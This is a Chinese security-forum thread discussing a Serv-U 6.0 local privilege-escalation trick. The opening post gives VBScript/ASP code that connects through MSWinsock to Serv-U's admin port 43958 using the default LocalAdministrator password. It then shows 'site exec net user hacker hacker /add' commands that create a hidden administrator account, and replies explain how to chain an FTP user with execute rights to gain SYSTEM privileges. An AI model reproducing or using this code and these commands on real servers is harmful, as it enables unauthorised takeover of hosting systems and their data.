[讨论]Serv-u6.0提权新招(结帖)
[讨论]Serv-u6.0提权新招(结帖)议题提交:宿心劫
第一次见到这段码时 认为是不可能的 因为控件的问题
现在听KEVIN的分析 就够了
我提出的第二个问题 是因为我没绕过一个弯
引用:
来源:黑客防线
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator? 密码:#|@$ak#.|k;0@p???下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户,代码如下:
Dim revdata
Dim sendata
Set sock=createobject(“MSWinsock.Winsock”)
Sock.protocol=0
Sock.connect “127.0.0.1”,43958
Sendata=”LocalAdministrator”& chr(10) &chr(13)
Sock.senddata snedata
Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)
Sock.senddata.sendata
使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add”?? “site exec net localgroup administrators hacker /add”
呵呵,就这样系统权限到手了,祝大家好运!
我有两个问题
一、MSWINSCK.OCX控件为VB 网络支持库 系统是不自带的
参考文章《关于VBS调用MSWinsock控件》
[url=http://www.eviloctal.com/forum/read.php?tid=8748&fpage=1]http://www.eviloctal.com/forum/read.php?tid=8748&fpage=1[/url]
二、文中提到"下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户"
我想问一下 这段本地提权的码 真的有system权限吗风停了 又吹 我忽然想起谁天亮了 又黑 我过了好几岁心暖了 又灰 世界有时候孤单的很需要另一个同类
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=101822055&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子108 精华[url=http://forum.eviloctal.com/digest.php?authorid=1091]4[/url] 积分3417 阅读权限100 性别男 来自浙江 在线时间3 小时 注册时间2004-12-19 最后登录2008-4-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1091]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]
[url=http://forum.eviloctal.com/space-uid-1952.html]kevin1986[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 恩....这样的主机的确是很少,不过我曾经遇见过有安装过VB的主机,这样的主机是可行的.因为MSWINSCK.OCX在VB中带的,所以可以用来创建连接.
而文章中说说的是向Serv-U的43958端口发包,也就是Su.exe这类提全工具的原理..明白否?me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself
帖子325 精华[url=http://forum.eviloctal.com/digest.php?authorid=1952]12[/url] 积分3936 阅读权限100 性别男 在线时间308 小时 注册时间2005-2-5 最后登录2007-9-3 [url=http://kevin.hididi.net]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1952]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-1091.html]宿心劫[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 提权的原理我一直都清楚
只是对那个控件表示怀疑
但Su.exe提权需要能够被执行(权限要求是有的)
而且文中提到是以system权限添加超级用户
我就不懂了
ASP执行时有那么大的权限?风停了 又吹 我忽然想起谁天亮了 又黑 我过了好几岁心暖了 又灰 世界有时候孤单的很需要另一个同类
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=101822055&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子108 精华[url=http://forum.eviloctal.com/digest.php?authorid=1091]4[/url] 积分3417 阅读权限100 性别男 来自浙江 在线时间3 小时 注册时间2004-12-19 最后登录2008-4-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1091]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日,预测咨询,公司改名,权威易经[/url]
[url=http://forum.eviloctal.com/space-uid-1931.html]我非我[/url] [img]http://forum.eviloctal.com/customavatars/1931.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 原理是和kevin说的一样。不过上面的ftp添加用户的语句没有给全。你可以到su.exe的原码里找。但如果是直接用”site exec net user hacker hacker /add”?? “site exec net localgroup administrators hacker /add” 这样发到43958是没用的。因为localadmin是没法执行。
你添加了ftp有执行权限的用户后再利用这个ftp用户添加系统用户。此时会有权限。因为它此时继承的是servu的权限。不是iisuser的了。
你看我的servuexp的php版的代码应该可以看懂。思路一样的。只不过这个代码是asp的,而且不太通用罢了。http://www.phpweblog.net/GaRY/
[url=http://wpa.qq.com/msgrd?V=1&Uin=309088292&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子150 精华[url=http://forum.eviloctal.com/digest.php?authorid=1931]6[/url] 积分5639 阅读权限100 性别男 在线时间189 小时 注册时间2005-2-4 最后登录2008-1-31 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1931]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-1952.html]kevin1986[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 不是呢...
那个控件是没问题了.
只是,用ASP调用这个控件对43958端口发送一串添加具有可执行的FTP帐户的包,然后再通过Serv-U来执行命令达到提升权限的目的.
这个相当于小我的SERV-U提权PHP程序的ASP版本吧.我曾经成功过的me=\"kEvin1986\" & chr(0) & \"at solitude\" msgbox len(me) \' You can see somthing. msgbox me \' But just part of it. \'i think i will hide part of myself
帖子325 精华[url=http://forum.eviloctal.com/digest.php?authorid=1952]12[/url] 积分3936 阅读权限100 性别男 在线时间308 小时 注册时间2005-2-5 最后登录2007-9-3 [url=http://kevin.hididi.net]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1952]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-1799.html]撕碎了的小C[/url] [img]http://forum.eviloctal.com/customavatars/1799.gif[/img]
技术核心组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level2.gif[/img] 如果可以向管理端口发送数据的话,得到的权限理论上应该跟SERV-U一样,如果SERV-U是以服务启动的话就可以得到SYSTEM权限。我是金子,我要闪光的....!
帖子128 精华[url=http://forum.eviloctal.com/digest.php?authorid=1799]4[/url] 积分3748 阅读权限200 性别男 来自湖南 在线时间124 小时 注册时间2005-1-28 最后登录2008-7-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1799]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-5352.html]serenade[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 如果SERV-U是以服务启动的,但是是以guest组用户启动的(组策略+服务设置),那么。。。不行。。。
帖子8 精华[url=http://forum.eviloctal.com/digest.php?authorid=5352]0[/url] 积分7 阅读权限40 在线时间51 小时 注册时间2005-6-3 最后登录2008-7-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=5352]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-3001.html]shoojun[/url] [img]http://forum.eviloctal.com/images/avatars/pw/2.gif[/img]
晶莹剔透§烈日灼然 那就必须在端口下工夫了!有什么攻击活动请告诉我!!!
[url=http://wpa.qq.com/msgrd?V=1&Uin=289944463&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子12 精华[url=http://forum.eviloctal.com/digest.php?authorid=3001]0[/url] 积分11 阅读权限40 性别男 来自E.S.T 在线时间0 小时 注册时间2005-3-24 最后登录2005-7-19 [url=http://shoojun.51.net]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=3001]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-155566.html]mlove[/url]
mlove
[img]http://forum.eviloctal.com/images/avatars/pw/barbie2.jpg[/img] 提示: 作者被禁止或删除 内容自动屏蔽
帖子20 精华[url=http://forum.eviloctal.com/digest.php?authorid=155566]0[/url] 积分-6 阅读权限0 性别男 来自邪恶八进制 在线时间8 小时 注册时间2008-1-8 最后登录2008-4-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=155566]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-71429.html]gxm[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]
页:
[1]